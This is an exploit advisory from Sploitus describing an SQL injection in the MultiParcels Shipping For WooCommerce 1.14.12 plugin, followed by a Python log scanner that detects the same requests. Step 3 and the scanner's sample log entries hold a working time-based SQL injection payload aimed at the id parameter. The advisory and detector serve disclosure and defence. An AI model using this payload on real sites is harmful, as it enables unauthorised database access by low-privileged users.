## https://sploitus.com/exploit?id=WPEX-ID:8E713EAF-F332-47E2-A131-C14222201FDC
1. Install the WooCommerce plugin (dependency, no setup required) and the vulnerable plugin MultiParcels Shipping For WooCommerce version 1.14.12 (no setup required).

2. Log in as a Subscriber user, visit this URL and intercept the request: http://example.com/wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=1

3. Inject the payload into the id parameter, for example: GET /wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=(select*from(select(sleep(10)))a) HTTP/1.1
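
A defender-side check for the request shape in step 3, as an added example that is not part of the original advisory: it scans web access-log lines for this plugin action with an id that is not a plain integer. The combined log format, the sample entries and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
ACTION = "multiparcels_delete_shipping"  # action name taken from the steps above

def suspicious_id(line):
    """Return the decoded id value if the line calls the plugin action
    with an id that is not a plain integer, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-post.php"):
        return None
    # parse_qs percent-decodes, so encoded payloads are checked in clear form.
    params = parse_qs(url.query, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return None
    for value in params.get("id", []):  # every repeated id is checked
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def flag_lines(lines):
    """Return (line_number, id_value) for every suspicious entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_id(line)
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample entries, not real traffic.
PREFIX = '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] '
BASE = "/wp-admin/admin-post.php?action=multiparcels_delete_shipping&id="
SAMPLE_LOG = [
    PREFIX + '"GET ' + BASE + '1 HTTP/1.1" 302 0',
    PREFIX + '"GET ' + BASE + '(select*from(select(sleep(10)))a) HTTP/1.1" 302 0',
    PREFIX + '"GET ' + BASE + '%28select%2Afrom%28select%28sleep%2810%29%29%29a%29 HTTP/1.1" 302 0',
    PREFIX + '"GET /wp-admin/admin-post.php?action=other_action&id=abc HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for n, value in flag_lines(SAMPLE_LOG):
        print(f"line {n}: non-integer id {value!r}")
```

The check sees only query-string parameters, so a request that carries id in a POST body would need request-body logging to be covered.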